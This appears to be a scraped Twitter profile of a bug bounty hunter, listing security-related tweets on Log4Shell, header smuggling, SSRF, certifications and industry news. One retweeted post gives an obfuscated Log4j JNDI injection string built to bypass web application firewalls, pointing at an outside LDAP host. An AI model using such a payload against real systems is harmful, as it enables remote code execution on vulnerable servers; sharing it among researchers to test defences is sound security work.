Nick || hunt4p1zza (@ngkogkos)'s Twitter Profile
Nick || hunt4p1zza

@ngkogkos

I find bugs for 🍕.

ID: 443537490

22-12-2011 08:29:41

2.2K Tweets

2.2K Followers

492 Following

Florian Roth ⚡️ (@cyb3rops):

What people seem to miss: The #Log4Shell vulnerability isn't just an RCE 0day. It's a vulnerability that causes hundreds and thousands of 0days in all kinds of software products. It's a 0day cluster bomb.

@levelsio (@levelsio):

🎉 I'm going to give one random person that retweets this $10,000. Because I’d rather spend my ad budget on you than BigTech 👩‍💻 I'm trying to promote my site Remote OK which helps you find a remote job so you don't need to go back to the office 💖 Thx! remoteok.com/?ref=twga2021

xxux11 ᯲ ̸ (@11xuxx):

So I share the last WAF bypass for log4j injection. WAF is OK but don't rely on them, they are fragile! Patch instead. ${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://mydogsbutt.com:1389/o} To bounty hunters: go go go! #bugbountytips

Paul Seekamp (@nullenc0de):

Content Discovery and Param Miner in Burp found a hidden directory and a parameter that were vulnerable to Log4j. The rest of the app was not vulnerable. CRAZY!😲

Nick || hunt4p1zza (@ngkogkos):

No doubt Daniel Thatcher's HTTP Header smuggling research made it to the top 10 for 2021. The article presents a simple yet powerful methodology to look for HTTP header parsing discrepancies leading to smuggling, bypasses etc. intruder.io/research/pract…

thomasg.eth (@thomasg_eth):

For the past two weeks, I've been targeted in an extremely thorough social engineering scam that nearly cost me all of my ETH. I'm super lucky to have made it through unscathed. Here's the story 👇

Yassine Aboukir 🐐 (@yassineaboukir):

Thái Vũ and I got to escalate a limited SSRF (CVE-2019-8451) on a BBP to extract AWS security credentials on the new metadata endpoint (IMDSv2), which is designed to block SSRF by rejecting unauthenticated GET and requiring a valid token to be passed in the header. It was fun!

Corben Leo (@hacker_):

In 2010, WikiLeaks released a classified document. A list of infrastructure critical to U.S. national security. The government listed a Trans-Atlantic cable. 3 years ago, 19-year-old me gained ADMIN access to that cable (and another; shared codebase). 🧵Here's how I found it

Nick || hunt4p1zza (@ngkogkos):

Ahead of the ISO 27001:2022 release, the ISO 27002:2022 update has recently been issued, outlining a restructure of the standard & several new controls. Dionach has created a high-level overview of this to help orgs prepare for ISO 27001:2022. bit.ly/3EOdIzf

Ed (@edoverflow):

After 5 years of work, security.txt is officially an RFC. I am pleased to announce RFC 9116: rfc-editor.org/rfc/rfc9116. I would like to use this opportunity to thank those who made this possible. Thank you. ❤️

Nick || hunt4p1zza (@ngkogkos):

Hooray - just passed the #AWS SCS-C01 Security Specialty certification! Definitely a hard exam, but totally worth it as I've learnt a ton of AWS #infosec specifics which should help with security consulting for cloud solutions.

Dionach (@dionachcyber):

Join us for a live masterclass run by @CIISecHQ on July 20th at 16.30 BST. Presented by Technical Consultant, Flaviu Popescu, we'll look at cryptojacking and the risk it poses to organisations - including a live simulation. Sign up for the event here - lnkd.in/epGMapid
